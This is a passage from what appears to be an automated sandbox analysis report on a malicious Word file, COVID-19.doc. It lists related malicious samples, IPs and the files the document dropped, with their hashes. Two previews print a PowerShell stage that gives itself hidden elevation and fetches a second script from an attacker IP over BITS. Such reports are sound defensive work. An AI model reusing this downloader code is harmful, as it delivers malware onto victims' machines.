                  • myexternalip.com/raw
                  EnkIyRDCVr.exeGet hashmaliciousBrowse
                  • ipecho.net/plain
                  ciechgroup-551288_xls.HtMlGet hashmaliciousBrowse
                  • svgur.com/i/G6D.svg
                  IeMWyHq3i0.exeGet hashmaliciousBrowse
                  • ipinfo.io/ip
                  c7.xlsmGet hashmaliciousBrowse
                  • ipinfo.io/json

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  ifconfig.meobaphx.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  obaphx.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  mmhXZ5ovM9.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  PO23294248429.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  CECn9xwtYd.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  Purchase Order.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://UeR.ReiyKiQ.ir/download.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://ero.bckl.ir/download.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  key.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  4ae27e2f7dc64cGet hashmaliciousBrowse
                  • 216.239.32.21
                  d118cec4f2e457Get hashmaliciousBrowse
                  • 216.239.32.21
                  e0f63b5d4abf7dGet hashmaliciousBrowse
                  • 216.239.32.21
                  COMPANY PROFILE.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  http://kecforging.com/products/cara.exeGet hashmaliciousBrowse
                  • 216.239.32.21
                  Product Specifications.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  INQ No REF1500-2019.docGet hashmaliciousBrowse
                  • 216.239.32.21
                  6cea111a5979b9Get hashmaliciousBrowse
                  • 216.239.32.21
                  2be662ee79084035914e9d6a6d6be10d.pngGet hashmaliciousBrowse
                  • 216.239.32.21
                  35Requst for Quote.exeGet hashmaliciousBrowse
                  • 216.239.32.21

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  GOOGLEUSim.vector.app.apkGet hashmaliciousBrowse
                  • 172.217.20.234
                  Payment list.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  2021 DOCS.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  0f9zzITIbk.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  inquiry PR11020204168.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  insz.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  RE.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  4892.htmGet hashmaliciousBrowse
                  • 172.217.22.225
                  _#Ud83d#Udcde_frances@viaseating.com.htmGet hashmaliciousBrowse
                  • 34.87.210.235
                  4892.htmGet hashmaliciousBrowse
                  • 142.250.180.161
                  SecuriteInfo.com.Trojan.PackedNET.509.28611.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  SecuriteInfo.com.Trojan.PackedNET.509.17348.exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  demo.jsGet hashmaliciousBrowse
                  • 142.250.180.161
                  demo.jsGet hashmaliciousBrowse
                  • 142.250.180.161
                  Details...exeGet hashmaliciousBrowse
                  • 34.102.136.180
                  PO-RY 001-21 Accuri.jarGet hashmaliciousBrowse
                  • 34.102.136.180
                  NEW AGREEMENT 19 01 2021.xlsxGet hashmaliciousBrowse
                  • 34.102.136.180
                  Release Pending messages on account.htmlGet hashmaliciousBrowse
                  • 142.250.180.161
                  Soa.docGet hashmaliciousBrowse
                  • 34.102.136.180
                  9oUx9PzdSA.exeGet hashmaliciousBrowse
                  • 34.89.33.35
                  AS-CHOOPAUSCOVID-19.docGet hashmaliciousBrowse
                  • 78.141.194.181
                  insz.exeGet hashmaliciousBrowse
                  • 141.164.40.157
                  9oUx9PzdSA.exeGet hashmaliciousBrowse
                  • 207.246.80.14
                  3KvCNpcQ6tvwKr5.exeGet hashmaliciousBrowse
                  • 45.76.199.220
                  Details for bookings.exeGet hashmaliciousBrowse
                  • 107.191.37.252
                  CQcT4Ph03Z.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  Details here.exeGet hashmaliciousBrowse
                  • 107.191.37.252
                  Carta de pago.exeGet hashmaliciousBrowse
                  • 207.148.72.173
                  SCAN_20210115140930669.exeGet hashmaliciousBrowse
                  • 139.180.142.220
                  EED7.exeGet hashmaliciousBrowse
                  • 207.246.80.14
                  G4Q6P4rcer.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  XdzlrPkDsI.exeGet hashmaliciousBrowse
                  • 136.244.98.158
                  fil1Get hashmaliciousBrowse
                  • 66.42.126.73
                  Mv Tiger Flame.xlsxGet hashmaliciousBrowse
                  • 137.220.48.181
                  J0OmHIagw8.exeGet hashmaliciousBrowse
                  • 45.77.226.209
                  DTwcHU5qyI.exeGet hashmaliciousBrowse
                  • 137.220.48.181
                  4wCFJMHdEJ.exeGet hashmaliciousBrowse
                  • 45.32.95.179
                  BSL 21 PYT.xlsxGet hashmaliciousBrowse
                  • 137.220.48.181
                  20210111140930669.exeGet hashmaliciousBrowse
                  • 139.180.142.220
                  H56P7iDwnJ.docGet hashmaliciousBrowse
                  • 207.148.24.55
                  ALEXHOSTMDYuDMWyldWb.exeGet hashmaliciousBrowse
                  • 176.123.10.30
                  Request for Quotation_1-06-21__dutchmen_ #25288_excelelx.exeGet hashmaliciousBrowse
                  • 45.67.229.38
                  OVl2ydWZDbGet hashmaliciousBrowse
                  • 213.226.100.140
                  eTrader-0.1.0.exeGet hashmaliciousBrowse
                  • 213.226.100.140
                  eTrader-0.1.0.exeGet hashmaliciousBrowse
                  • 213.226.100.140
                  update_2021-01-02_17-23.exeGet hashmaliciousBrowse
                  • 176.123.6.176
                  OhGodAnETHlargementPill.sfx.exeGet hashmaliciousBrowse
                  • 45.67.229.182
                  o5oNiZzC2b.exeGet hashmaliciousBrowse
                  • 176.123.6.176
                  OCC-221220-TBU1XAT7X4.xlsGet hashmaliciousBrowse
                  • 45.142.212.128
                  xTWBTe8Yz3.exeGet hashmaliciousBrowse
                  • 176.123.2.251
                  xG4rjYxzCT.dllGet hashmaliciousBrowse
                  • 45.67.229.97
                  svhost.ps1Get hashmaliciousBrowse
                  • 176.123.8.228
                  SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                  • 176.123.0.55
                  IW2g2rzW9x.exeGet hashmaliciousBrowse
                  • 176.123.9.138
                  http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=Get hashmaliciousBrowse
                  • 176.123.0.55
                  OrM0pS5PdK.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  hffMSxRxrO.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  uUYx0SUnV5.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  jocniwuamG.exeGet hashmaliciousBrowse
                  • 45.67.229.13
                  v3ARXpc5fv.exeGet hashmaliciousBrowse
                  • 45.67.229.13

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24576
                  Entropy (8bit):1.2338110237198683
                  Encrypted:false
                  SSDEEP:96:+rTtiFq8ZhMOLUshNOn3TZh2XvOLUsCNOTjOkNf8Zm8ZEiv:ksogZ2ZdOOfjS
                  MD5:655E69432F4BB520E935E4AD133959CC
                  SHA1:B03CC64E540A54D9FDA8DA009397B73CB441F483
                  SHA-256:3B1739AE96A45596B7464F47DF41FC5BC13E037ED33F04D255C788320165519A
                  SHA-512:AD70586C5F928369B18F65A0EFFA204560658789B11E477A9E17DA499D80238DAF20349DFCB1F467DF23E707138257CD1B11267BF996420AE3320645B8975C05
                  Malicious:false
                  Preview: ......:{..(.....*....y!.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................*....y!...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0a413005, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):0.09583166594308014
                  Encrypted:false
                  SSDEEP:12:Ev0+9k1O4blIXg8KSv0+9k1O4blIXg8K:togLog
                  MD5:2147A4BA5A3B6D985B3DDFA5636859E1
                  SHA1:4D65B30E8251823BA994FFDBD0933E934BF3DF02
                  SHA-256:CF4219AFB18DE7BFFE5BB0D82F7539C225BE5F8C8DC30D63F1E25B582561240C
                  SHA-512:17465F558BE4271B3F3D79D4790BDC41A934B077656599AD35C0D4E21B9B1165F95C2EA123F1CD7DB9EF3245DC85D86AC68A298AFD89CBF21847A04D6E22D0E1
                  Malicious:false
                  Preview: .A0.... ................e.f.3...w........................&..........w..*....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................|\^.*....y..................F...*....y..........................................................................................................................................................................................................................................................................................................................................................................................
                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):0.11187021931662426
                  Encrypted:false
                  SSDEEP:3:x/7EvPCTIl/bJdAtiiCT/oll:x/iCIt4jCTA
                  MD5:54D14AF16FB2CA5188B3B762BB7979B0
                  SHA1:49E8E55B2CCBC94AB6347DE7E8417B437D12F9B2
                  SHA-256:3C1C5676817ED4262A9670701E59E1C61BD11089A414673F96265008655E5B79
                  SHA-512:D67C5BAC609884C53EDE81983BFAB017B82A8EDAD2F57CCC808957270D0CEBD0481349ED5190DAE34D8E0093201EB66B27D6F1B428173156B2EDB76EB1C3CCAD
                  Malicious:false
                  Preview: `..5.....................................3...w..*....y.......w...............w.......w....:O.....w..................F...*....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{DB96EF63-FF50-4F07-B9F6-FD0B9439C462}.tmp
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt
                  Process:C:\Windows\SysWOW64\wscript.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):1447
                  Entropy (8bit):5.2641765089103165
                  Encrypted:false
                  SSDEEP:24:B2hmZrhzxyzTsSN9WSEDhgFsf81iem3fPb2QGKJmEP8Lz6XGy6V:l/xAsfSEDhgFc2iemPPbJaEPQzhnV
                  MD5:9C0E8594784CC219239DF1906495C0F9
                  SHA1:CD83A127C63B595C1D0772AFCBBC361B18BDC65D
                  SHA-256:5374E582A5A0D2F1A28E9E93CE7D619C018DA3AAD1D3E232E30163232AF74B7E
                  SHA-512:D750385EEE0600314D00CF785F2C2734CFD857C9E3E66D681936301CBAF2F29A017165B0824A7C03BF28587874DB25FE99943D2DB568960DF29D80F98E13105A
                  Malicious:false
                  Yara Hits:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt, Author: Florian Roth
                  IE Cache URL:http://78.141.194.181/d569872345345.txt
                  Preview: param([Int32]$adminRights = 0).if( $adminRights -eq 0 ).{..$args = '-ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "' + $MyInvocation.InvocationName + '" -adminRights 1'..$runned = $false..while( -not $runned )..{...Try...{....Start-Process -FilePath "powershell.exe" -ArgumentList $args -WindowStyle Hidden -Verb RunAs....$runned = $true...}...Catch...{...}..}.} .else {. $OSArchitecture = (Get-WmiObject -Class Win32_OperatingSystem | Select-Object OSArchitecture -ErrorAction Stop).OSArchitecture. if ($OSArchitecture -Eq '64-bit') {. $ppshome = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'. } else {. $ppshome = 'C:\Windows\System32\WindowsPowerShell\v1.0'. }.. $url = "http://78.141.194.181/s34987435987.txt".. $dstFile = [System.IO.Path]::GetRandomFileName() + '.ps1'. $file = $ppshome + '\' + $dstFile.. Import-Module BitsTransfer. Start-BitsTransfer -Source $url -Destination $file.. $service = 'sc
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8309
                  Entropy (8bit):4.858741987165529
                  Encrypted:false
                  SSDEEP:192:Axoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smUjdcU6CupOC:kEdVoGIpN6KQkj2Zkjh4iUxgpib4J
                  MD5:A1B380E20D97DC92053ADA0D7FF86B1B
                  SHA1:258A9B538055B68FEC01FBFA2B9C0B5C2EEA76F1
                  SHA-256:FA196A087B05DF4494E4551FC811EC4459572913EB92D5FC9FFDFAE3FF17E639
                  SHA-512:A43143DF1D6BF028B829404F8D567D5CB4E2A5A1F726CFDB5D89229D54E9A80781732C29987409894F603BDAE49FA733AF465B31A2B7B3FA8111B6EF506CA5DA
                  Malicious:false
                  Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):20824
                  Entropy (8bit):5.620475197980355
                  Encrypted:false
                  SSDEEP:384:AtPfXPwV9etYYZks0P02pR8nkSBRMnXHnccsjcGPqIPD2eI49xSa5jWgVym/xJo9:hYisU6k4RMX8VQGiii1WpiX+Jo9
                  MD5:A66B9C5EA955B7CEAE4B61D8CF649A8E
                  SHA1:B3AA6DD2E94DB27E2795BF136385178C82541D4F
                  SHA-256:6B4FBE053A7588BC716887563CF9E37221C6035920BECEE3DBCDE0D57C9A279D
                  SHA-512:B4D0381D096A23D48A59D7608220B09ECA891450544B66D173861AD68FF7D839AA5EC1A3F67EBAF5F99C21EEAA4A7F7C8F5C970921CEDEE75739D91172355E08
                  Malicious:false
                  Preview: @...e.......................K.9.*.....'..............@..........H...............<@.^.L."My...:H..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)M.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f....j.......System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):170164
                  Entropy (8bit):4.36684997290107
                  Encrypted:false
                  SSDEEP:1536:fv0WZ5LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fcqg8WpFpKKHHedydFeo+oQLUlPoK0
                  MD5:122A0A4C7C046C176AB6DB101AD18165
                  SHA1:F73D7FA4E1C6F2BA9BB7CCE176530C31BCAD1088
                  SHA-256:49D609F70DD72226B8A8C8DFA9FED95E29A0351F7FAE4915D0D8F0B011C92B86
                  SHA-512:E0E56500F38D6772DBD22E5947CDCF759037F9C51EC5F337DD4FE668B33BFC98C419A012D78940DAE004DC3476689C54CD7426559AD39DB28D3814567C1975C6
                  Malicious:false
                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2b2zdnjw.tgz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhkzhmez.maj.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmgpy3a4.cbw.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjrgunro.pw2.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COVID-19.LNK
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Wed Jan 20 08:30:44 2021, atime=Wed Jan 20 08:30:41 2021, length=411136, window=hide
                  Category:dropped
                  Size (bytes):2090
                  Entropy (8bit):4.709359334679344
                  Encrypted:false
                  SSDEEP:24:8l2W/ahg/YE+BVAAbOnl+Dc7aB6myl2W/ahg/YE+BVAAbOnl+Dc7aB6m:8P/M+AlB6pP/M+AlB6
                  MD5:9A8424B72F27D539FE6889E93E0179B7
                  SHA1:96026EC03E024DAE3AE2AD2F17762CBC7E1CDDE6
                  SHA-256:58AD9FBDCB94F9FC615E650C5DD3A33205A4F340756505FCBD3F430FF787DF9D
                  SHA-512:2BE61A06A97016367BB1EDB1470E9A5761088AAC5417FC9F920162FABC0BAE9E2ED78EAF19999C32FF6296FA0221B08A8F874F0F248A9AC329BFAFF032F983A4
                  Malicious:false
                  Preview: L..................F.... ....;.R......q..............F...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4R.K....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..4R.K....#J....................k...j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N..4R.K.....Y..............>......B..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..F..4R.K .COVID-19.doc..J......>Qz<4R.K.....V....................W...C.O.V.I.D.-.1.9...d.o.c.......R...............-.......Q...........>.S......C:\Users\user\Desktop\COVID-19.doc..#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):62
                  Entropy (8bit):4.344717181690711
                  Encrypted:false
                  SSDEEP:3:M1DxFu4o+oxFu4omX1DxFu4ov:M/jqjVjy
                  MD5:F63AF074E210140025C91FB35C1FBC43
                  SHA1:63341061EB572C4D72AA6486843692E86ABE62FD
                  SHA-256:E41B2FC6D51793A5613E73950232522FE1D8A7328E4D2A2E56333A1774668BD1
                  SHA-512:E2DC1D9A75D99CA803A29AD2460C9E8C9081F8B750DC31F885A7ECE6E8E38FA940022437799A6B38487A015901BC28E3897DC05106CAAB4B0902B0ECBC9DFAC3
                  Malicious:false
                  Preview: [doc]..COVID-19.LNK=0..COVID-19.LNK=0..[doc]..COVID-19.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.163644166813932
                  Encrypted:false
                  SSDEEP:3:Rl/Zdb+R2dt/9NiPD/t/9RCo1hln:RtZZ+R6tiPNCoR
                  MD5:E7A547F4EA7699D3A54DE5C681B1A054
                  SHA1:E1959753D1C4DBE965FD387229BAE4768BB9E347
                  SHA-256:47BACA51EB9EAB8514BAA8367E1C43B634FC324CC9741EA7E8F32096565BC8DB
                  SHA-512:B3FF14D583DEFBD09553F1633F878164F6F4F2F706710CF5F4913E8AA029AE21AF5258064FD809289C69F746AAD411D735242DC78706C368683D91C5FB511048
                  Malicious:false
                  Preview: .pratesh................................................p.r.a.t.e.s.h..........8.B............................<.2.............................0.................
                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                  Category:dropped
                  Size (bytes):22
                  Entropy (8bit):2.9808259362290785
                  Encrypted:false
                  SSDEEP:3:QAlX0Gn:QKn
                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                  Malicious:false
                  Preview: ....p.r.a.t.e.s.h.....
                  C:\Users\user\Desktop\COVID-19.ps1
                  Process:C:\Windows\SysWOW64\wscript.exe
                  File Type:Little-endian UTF-16 Unicode text, with CR, LF line terminators
                  Category:dropped
                  Size (bytes):2900
                  Entropy (8bit):3.640765124039009
                  Encrypted:false
                  SSDEEP:48:hkM8lfpHyND/7rFucerCrdTAZVx2qJjuYllzT+FuidV9RiHBt92dA/HOu:OMypHuzxeuCZbrNuYllzT4uiX9RtS/H3
                  MD5:C8CFEDB371AFA966C9ED6B715D694BA3
                  SHA1:1ECFA6E23A05F3E90EFE009F6E4316F0EC487E73
                  SHA-256:4CE39D2AA80D4110D4042DA7A38A58D6BFA7E3F5D604E4DF8394604B4864BBE6
                  SHA-512:525145CE57E493071970FA5F8C4FEA845BE292EA214D2EC335987DB12AE969F8556D3709191FA8B1AD495337072654ABDB40A656EA0363790541E799053EE443
                  Malicious:true
                  Preview: ..p.a.r.a.m.(.[.I.n.t.3.2.].$.a.d.m.i.n.R.i.g.h.t.s. .=. .0.)...i.f.(. .$.a.d.m.i.n.R.i.g.h.t.s. .-.e.q. .0. .)...{.....$.a.r.g.s. .=. .'.-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.N.o.L.o.g.o. .-.N.o.n.I.n.t.e.r.a.c.t.i.v.e. .-.N.o.P.r.o.f.i.l.e. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.F.i.l.e. .".'. .+. .$.M.y.I.n.v.o.c.a.t.i.o.n...I.n.v.o.c.a.t.i.o.n.N.a.m.e. .+. .'.". .-.a.d.m.i.n.R.i.g.h.t.s. .1.'.....$.r.u.n.n.e.d. .=. .$.f.a.l.s.e.....w.h.i.l.e.(. .-.n.o.t. .$.r.u.n.n.e.d. .).....{.......T.r.y.......{.........S.t.a.r.t.-.P.r.o.c.e.s.s. .-.F.i.l.e.P.a.t.h. .".p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.A.r.g.u.m.e.n.t.L.i.s.t. .$.a.r.g.s. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.V.e.r.b. .R.u.n.A.s.........$.r.u.n.n.e.d. .=. .$.t.r.u.e.......}.......C.a.t.c.h.......{.......}.....}...}. ...e.l.s.e. .{... . . . .$.O.S.A.r.c.h.i.t.e.c.t.u.r.e. .=. .(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m. .|. .S.e.l.e.c.t.-.O.b.j.e.c.t. . . . .O.S.A.r.
                  C:\Users\user\Desktop\COVID-19.tmp
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):554
                  Entropy (8bit):5.211432965029686
                  Encrypted:false
